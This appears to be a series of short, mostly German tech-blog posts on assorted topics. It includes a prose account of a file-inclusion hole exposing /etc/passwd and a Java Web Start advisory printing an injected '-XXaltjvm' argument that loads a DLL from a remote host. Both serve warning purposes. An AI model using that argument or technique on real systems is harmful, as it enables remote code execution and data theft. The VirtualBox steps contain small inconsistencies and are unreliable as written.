1
2
3
4
5
6
7
8
9
10
11

var MongoStore = require('connect-mongodb');
app.use(express.logger({ format: ':method :url'}));
app.use(express.bodyParser());
app.use(express.methodOverride());
app.use(express.cookieDecoder()); // <= runtime error appears here
app.use(express.session({
	secret: settings.cookie_secret,
	store: new MongoStore({
		db: settings.db
	})
}));

After some investigation I found out that in Express 2.0.0beta3, the function cookieDecoder() has been renamed to cookieParser(); the same comes true for bodyDecoder() which now needs to be called as bodyParser(). At least now I know why some of the example code failed

Ich habe schon viele gute Bewerbungen erhalten, aber sie waren alle nichts gegen den Kerl, der heute morgen per Email hereingeflogen kam. Die Eckdaten waren schonmal vielversprechend:

• 12+ years PHP experience
• 8+ years Perl experience
• sehr ansprechender Stundenlohn

Das klingt nach einem Perl-Guru, der dann auf PHP umgesattelt ist, nicht wahr?

Es wurden zwei PHP-Projekte zur Referenz angeboten, direkt mal angeschaut und vom Stuhl gefallen. Der Grund ist nicht wirklich schwer zu finden, die URL sah wie folgt aus:

http://XXXXXXXXXXXX.com/?main=pce/index.php

Für die Personen die spätestens jetzt total verwirrt sind: Der Homepage wird hinter dem ? der Variable main die Adresse zu einem PHP-Script zugewiesen (und zwar pce/index.php).

Wenn man also den Inhalt von main entsprechend verändert, kann man beliebige Dateien des Servers anzeigen. Beispiel:

So können wir die Datei /etc/passwd auslesen, in der Informationen über die Benutzeraccounts eines Linux-Systems gespeichert sind. Natürlich ist jetzt auch nicht mehr weit bis zu einem erfolgreichen Hack, aber darum geht es an dieser Stelle auch nicht.

Es gab noch einige weitere Sicherheitslücken in seinen Referenzprojekten, und nett wie ich bin habe ich sie ihm natürlich auch sofort mitgeteilt.

Den Job wird er aber nicht bekommen und hiermit verabschiede ich mich, sprachlos.

1
2
3

ERROR: limitcheck
OFFENDING COMMAND: image
STACK: false , ( Resource/ProcSet/ComposeOCF ) , ( r ) ,

Nachdem ich die Bilddatei mit Gimp öffnete, wurde mir in einem Dialog die Farbraumkonvertierung zu SRGB angeboten. Nachdem diese durchgeführt wurde, speicherte ich das Bild unter einem anderen Dateinamen und der Druckvorgang funktionierte endlich wieder

Bei der Sicherheitslücke handelt sich um eine Command Execution Vulnerability die durch unterlassenes Überprüfen der Aufrufparameter von javaws.exe entstanden ist. Wenn ein bei der Einbindung von Java-Applets angegebener Parameter in der Form vom " -XXaltjvm="\\12.34.56.78\virus.dll vorliegt, wird von dem Java Runtime Environment die Datei unter \\12.34.56.78\virus.dll heruntergeladen und ausgeführt. Ooops!

Der folgende Codeschnipsel dürfte genügend Aufschluss über die Einbindung der betroffenen Parameter docbase und launchjlnp geben.

1
2
3
4
5
6
7
8
9
10

if (browser == 'MSIE') {
	document.write('<' + 'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" '
		+ 'width="0" height="0">' + '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>'
		+ '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>'
		+ '<' + '/' + 'object' + '>');
} else if (browser == 'Netscape Family') {
	document.write('<' + 'embed type="application/x-java-applet;jpi-version='
		+ deployJava.firefoxJavaVersion + '" ' + 'width="0" height="0" '
		+ 'launchjnlp="' +  jnlp + '"' + 'docbase="' +  jnlpDocbase + '"' +	' />');
}

Bis zu einem Schließen dieser Sicherheitslücke sollte jeder im Browser Java ausstellen.

1
2
3
4

$OUT .= "<option value=\"" .
(($OUTPUT_VALUE != null)?$A[$OUTPUT_VALUE] : $A["name"]) . "\" " .
(($OUTPUT_EXTRA != null)?(($A[$OUTPUT_EXTRA] == $OUTPUT_EXTRA2)?"selected":""):"") .
"> " . htmlentities($A["name"], ENT_QUOTES) . "</option>";

Eine weitere Perle, zur besseren Übersicht aus der 200 Zeichen langen Konkatenation herausgenommen:

1

((($OUTPUT_EXTRA3 !== null || strlen($OUTPUT_EXTRA3) > 3) && $OUTPUT_EXTRA3!=='undefined')?$OUTPUT_EXTRA3:'Ziel wählen')

Es gibt Tage, da zweifle ich echt an meiner Berufswahl!

Das ist eine Firewall.

Bei einer von meinen Seite mit hauptsächlich statischem Content wurde am allgemeinen Seitenaufbau etwas geändert, diese Änderung resultierte darin, dass jede Seite dieser Homepage fast 1/4 weniger Overhead an sinnlosen Footerlinks und ähnlichem hatte. Man hat diese Änderung auch direkt in den Aufrufstatistiken gesehen.

Mein Projekt war circa 14 Tage in der "Google-Sandbox" eingeschlossen.

Das Tolle ist nun, dass sich die Sache ja normalerweise eigentlich normalisieren sollte — und ich warte zur Zeit immernoch auf ein erreichen der alten Zugriffszahlen. Gilt in diesem Fall eigentlich auch das alte Informatiker-Sprichwort “Never change a running system” ?!

Die Language Files für die Deutsche bbPress Übersetzung gibt es hier im SVN der Firma Automaticc. Einfach in /bb-includes/languages/ speichern und in der bb-config.php die die Sprache auf “de” abändern.

Ich hoffe wirklich, dass es bei bbPress weniger Sicherheitslücken als bei meinem geliebten WordPress geben wird!

-

Hello dear extension developer, if you see somehere an XUL error like “undefined entity” whilst dealing with your extension’s locale files, just make sure that you saved all of them in UTF-8 character encoding. This really saves hours, at least for me

Could not load the Host USB Proxy Service (VERR_FILE_NOT_FOUND). The service might be not installed on the host computer.

Die Erklärung für dieses Problem liegt in einem Bugreport bei Virtualbox:

The usbfs support has been disable in the gutsy version by default. It works well after turning it on in the /etc/init.d/mountdevsubfs.sh file.

auf gut Deutsch: Man kommentiere in der Datei /etc/init.d/mountdevsubfs.sh einige Zeilen aus. Also einfach per

sudo nano /etc/init.d/mountdevsubfs

mit dem Editor auf die Datei zugreifen und die vier Zeilen nach

    #
    # Magic to make /proc/bus/usb work
    #

auskommentieren, also die Raute (#) am Anfang entfernen.
Nun sollte mit Ubuntu und Virtualbox wieder alles funktionieren!